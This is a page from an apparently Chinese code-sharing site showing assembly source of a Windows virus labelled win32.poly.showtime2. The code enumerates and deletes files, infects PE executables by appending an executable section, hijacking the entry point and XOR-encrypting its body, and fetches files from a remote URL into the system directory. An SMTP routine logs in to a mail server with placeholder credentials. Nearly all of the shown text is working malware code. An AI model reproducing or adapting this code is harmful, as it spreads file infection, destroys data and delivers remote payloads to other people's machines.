?? win32.poly.showtime2.txt
字號(hào):
EN_NEXT:
push edi
push hSearch
call _FindNextFile[ebx]
.UNTIL eax==0 ;FindNexeFile fail
ED_Close:
push hSearch
call _FindClose[ebx]
ED_Exit:
popad
ret 8
EnumDir ENDP
AnFile PROC FileName:DWORD,FileType:DWORD
pushad
AF_00: lodsb
or al,al
jnz AF_00
.if FileType == FILE_ALL ;all
push FileName
call _DeleteFile[ebx]
.elseif FileType == FILE_EXE ;exe
mov eax,DWORD ptr [esi-5]
.if eax =="exe."
push FileName
call InfectFile
.elseif eax == "mth."
push FileName
call Parse_HTM
.endif
.endif
popad
ret 8
AnFile ENDP
;感染PE文件
InfectFile PROC FileName : DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
LOCAL ByteWrite: DWORD
pushad
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push FileName
call _CreateFile[ebx];打開(kāi)要感染的文件
cmp eax,INVALID_HANDLE_VALUE
jz IF_Exit
mov hFile,eax
push 0
push 0
push 0
push PAGE_READWRITE
push NULL
push hFile
call _CreateFileMapping[ebx] ;創(chuàng)建內(nèi)存映射文件
or eax,eax
jz IF_F3
mov hMapping , eax
push 0
push 0
push 0
push FILE_MAP_READ+FILE_MAP_WRITE
push hMapping
call _MapViewOfFile[ebx] ;映射為可讀寫(xiě)
or eax,eax
jz IF_F2
mov pMapping,eax
mov esi,eax
assume esi :ptr IMAGE_DOS_HEADER;ESI指向IMAGE_DOS_HEADER結(jié)構(gòu)
.IF [esi].e_magic!=IMAGE_DOS_SIGNATURE ;是否是MZ
jmp IF_F1
.ENDIF
.IF [esi].e_lfarlc!=040h
jmp IF_F1
.ENDIF
add esi,[esi].e_lfanew ;此時(shí)edx指向IMAGE_NT_HEADERS
assume esi:ptr IMAGE_NT_HEADERS
.IF [esi].Signature!=IMAGE_NT_SIGNATURE ;是PE文件嗎?
jmp IF_F1
.ENDIF
.IF word ptr [esi].OptionalHeader.Subsystem!=2
jmp IF_F1
.ENDIF
.IF word ptr [esi+1ah]==0888h ; 感染標(biāo)志
jmp IF_F1
.ENDIF
mov eax,[esi].OptionalHeader.AddressOfEntryPoint;取原程序入口偏移
add eax,[esi].OptionalHeader.ImageBase ;加上基地址
mov HostEntry[ebx],eax ;保存原入口
;***************************************************************
;判斷是否有足夠空間存儲(chǔ)新節(jié)
;28h=sizeof IMAGE_SECTION_HEADER
;18h=sizeof IMAGE_FILE_HEADER+Signature
;edi將指向新節(jié)
;***************************************************************
movzx eax,[esi].FileHeader.NumberOfSections ;取文件中的塊數(shù)
mov ecx,28h
mul ecx
lea edi,[esi]
sub edi,pMapping
add eax,edi
add eax,18h
movzx edi,[esi].FileHeader.SizeOfOptionalHeader
add eax,edi
mov edi,eax
add edi,pMapping ;I forgot this first
add eax,28h
.IF eax>[esi].OptionalHeader.SizeOfHeaders
jmp IF_F1
.ENDIF
;*****************************************
;空間允許, ^0^,開(kāi)始插入新節(jié)并填充各字段
;esi指向原文件最后一個(gè)節(jié),利用它來(lái)填充新節(jié)某些字段
;*****************************************
inc [esi].FileHeader.NumberOfSections
assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],69657769h ;"haiwei"
mov WORD ptr [edi+4],6168h;
push [esi].OptionalHeader.SizeOfImage
pop eax
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
push eax ;塊對(duì)齊
pop [edi].VirtualAddress
mov eax,VirusLen
mov [edi].Misc.VirtualSize,eax
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx
inc eax
mul ecx
mov [edi].SizeOfRawData,eax
lea eax,[edi-28h+14h] ;PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;SizeOfRawData
mov ecx,[ecx]
add eax,ecx
mov [edi].PointerToRawData,eax
mov [edi].Characteristics,0E0000020h ;可讀可寫(xiě)可執(zhí)行
;***************************************************************
;更新SizeOfImage,AddressOfEntryPoint,使新節(jié)可以正確加載并首先執(zhí)行
;***************************************************************
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
mov eax,[edi].VirtualAddress
mov [esi].OptionalHeader.AddressOfEntryPoint,eax
mov word ptr [esi+1ah],0888h ;寫(xiě)入感染標(biāo)志
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
push VirusLen
push NULL
call _VirtualAlloc[ebx]
or eax,eax
jz IF_F1
mov pMem[ebx],eax
push edi
push esi
mov edi,eax
lea esi,[offset VStart+ebx]
mov ecx,VirusLen
cld
rep movsb
lea eax,[offset Load+ebx]
push ecx
lea ecx,[offset VStart+ebx]
sub eax,ecx
add eax,pMem[ebx]
pop ecx
mov ecx,EncryptLen/4
En:
xor DWORD ptr [eax],12345678h
add eax,4
loop En
pop esi
pop edi
push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hFile
call _SetFilePointer[ebx]
;****************************************************************
;設(shè)置文件指針到結(jié)尾后,寫(xiě)入從VStart開(kāi)始的代碼,大小經(jīng)過(guò)文件對(duì)齊
;****************************************************************
push 0
lea eax,ByteWrite
push eax
push VirusLen
mov eax,pMem[ebx]
push eax
push hFile
call _WriteFile[ebx]
IF_F1:
push pMapping
call _UnmapViewOfFile[ebx]
IF_F2:
push hMapping
call _CloseHandle[ebx]
IF_F3:
push hFile
call _CloseHandle[ebx]
IF_Exit:
popad
ret 4
InfectFile ENDP
;*******************************
;下載文件代碼
;*******************************
DownloadFile proc dwFile:DWORD
pushad
call szWininet
db "Wininet.dll",0
szWininet:
call _LoadLibraryA[ebx]
or eax,eax
jz DF_ret
mov esi,eax
push MAX_PATH
call szFileName
dwFileName db MAX_PATH dup(0)
szFileName:
pop edi
push edi
call _GetSystemDirectory[ebx]
or eax,eax
jz DF_ret
@pushsz "\"
push edi
call _lstrcat[ebx]
push dwFile
push edi
call _lstrcat[ebx]
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
push edi
call _CreateFile[ebx]
cmp eax,INVALID_HANDLE_VALUE
jnz Fexsting
call szInternetOpen
db "InternetOpenA",0
szInternetOpen:
push esi
call _GetProcAddress[ebx]
push 0
push NULL
push NULL
push INTERNET_OPEN_TYPE_PRECONFIG
call AgentName
db "szlogin",0
AgentName:
call eax
or eax,eax
jz DF_ret
mov hSession[ebx],eax
call szInternetOpenUrl
db "InternetOpenUrlA",0
_InternetOpenUrlA dd 0
szInternetOpenUrl:
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _InternetOpenUrlA[ebx],eax
call Url
db "http://xxx.net/",0
szUrl db MAX_PATH dup (0)
Url:
lea edi,[offset szUrl+ebx]
push edi
call _lstrcpy[ebx]
push dwFile
push edi
call _lstrcat[ebx]
push 0
push INTERNET_FLAG_NO_AUTO_REDIRECT
push 0
push NULL
push edi
push hSession[ebx]
call _InternetOpenUrlA[ebx]
or eax,eax
jz DF_ret
mov DWORD ptr hHttpFile[ebx],eax
mov DWORD ptr dwRead[ebx],MAX_PATH
call szHttpQueryInfo
db "HttpQueryInfoA",0
szHttpQueryInfo:
push esi
call _GetProcAddress[ebx]
mov edi,eax
push NULL
lea ecx,[offset dwRead+ebx]
push ecx
lea ecx,[offset szBuffer+ebx]
push ecx
push HTTP_QUERY_STATUS_CODE
push hHttpFile[ebx]
call edi
push NULL
lea ecx,[offset dwRead+ebx]
push ecx
lea ecx,[offset szBuffer+ebx]
push ecx
push HTTP_QUERY_CONTENT_LENGTH
push hHttpFile[ebx]
call edi
push NULL
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
lea ecx,[offset dwFileName+ebx]
push ecx
call _CreateFile[ebx]
cmp eax,INVALID_HANDLE_VALUE
jz DF_ret
mov hSaveFile[ebx],eax
call szInternetReadFile
db "InternetReadFile",0
szInternetReadFile:
push esi
call _GetProcAddress[ebx]
mov edi,eax
.repeat
lea ecx,[offset dwRead+ebx]
push ecx
push sizeof szBuffer
lea ecx,[offset szBuffer+ebx]
push ecx
push hHttpFile[ebx]
call edi
.if eax
.break .if dwRead[ebx]== 0
push NULL
lea ecx,[offset dwWrite+ebx]
push ecx
push dwRead[ebx]
lea ecx,[offset szBuffer+ebx]
push ecx
push hSaveFile[ebx]
call _WriteFile[ebx]
.endif
.until 0
Fexsting:
push MAX_PATH
lea edi,[offset dwFileName+ebx]
push edi
call _GetSystemDirectory[ebx]
or eax,eax
jz DF_ret
@pushsz "\"
push edi
call _lstrcat[ebx]
push dwFile
push edi
call _lstrcat[ebx]
DF_ret:
push hSaveFile[ebx]
call _CloseHandle[ebx]
call szInternetCloseHandle
db "InternetCloseHandle",0
szInternetCloseHandle:
push esi
call _GetProcAddress[ebx]
mov edi,eax
push hHttpFile[ebx]
call edi
push hSession[ebx]
call edi
popad
lea eax,[offset dwFileName+ebx]
ret
DownloadFile endp
;**************************************
;發(fā)送郵件過(guò)程
;**************************************
SendMail proc eMail:DWORD
pushad
lea ecx,[offset wsa+ebx]
push ecx
push 101h
call _WSAStartup[ebx]
or eax,eax
jnz SM_ret
push 0
push SOCK_STREAM
push AF_INET
call _socket[ebx]
cmp eax,-1h
jz SM_ret
mov esi,eax
lea edi,[offset sock+ebx]
assume edi:ptr sockaddr_in
mov [edi].sin_family,AF_INET
push 25
call _htons[ebx]
mov [edi].sin_port,ax
call PushSmtpSrvr
db "smtp.163.com",0
PushSmtpSrvr:
call _gethostbyname[ebx]
assume eax:ptr hostent
mov eax,DWORD ptr [eax].h_list
mov eax,DWORD ptr [eax]
mov eax,DWORD ptr [eax]
mov DWORD ptr[edi].sin_addr,eax
push sizeof sockaddr_in
push edi
push esi
call _connect[ebx]
cmp eax,-1h
jz SM_ret
push 0
push 13
call Ehlo
db "EHLO o1i5a4",0dh,0ah
buffer db 2000h dup(0)
szCap db "test",0
Ehlo:
push esi
call _send[ebx]
push 0
push 12
call Auth
db "AUTH LOGIN",0dh,0ah
Auth:
push esi
call _send[ebx]
push 0
push 18
call szUserName
db "dfadsfaadf",0dh,0ah,0
szUserName:
push esi
call _send[ebx] ;發(fā)送用戶名.......
push 0
push 14
call Pass
password db "xxxxxxxxx",0dh,0ah,0 ;這里是經(jīng)過(guò)BASE64編碼的密碼
Pass:
push esi
call _send[ebx]
;invoke recv,esi,addr buffer,2000h,0
;invoke MessageBox,NULL,addr buffer,addr szCap,MB_OK
push 0
push 32
call Mailfrom
db "MAIL FROM: xxxx@163.com",0dh,0ah
Mailfrom:
?? 快捷鍵說(shuō)明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號(hào)
Ctrl + =
減小字號(hào)
Ctrl + -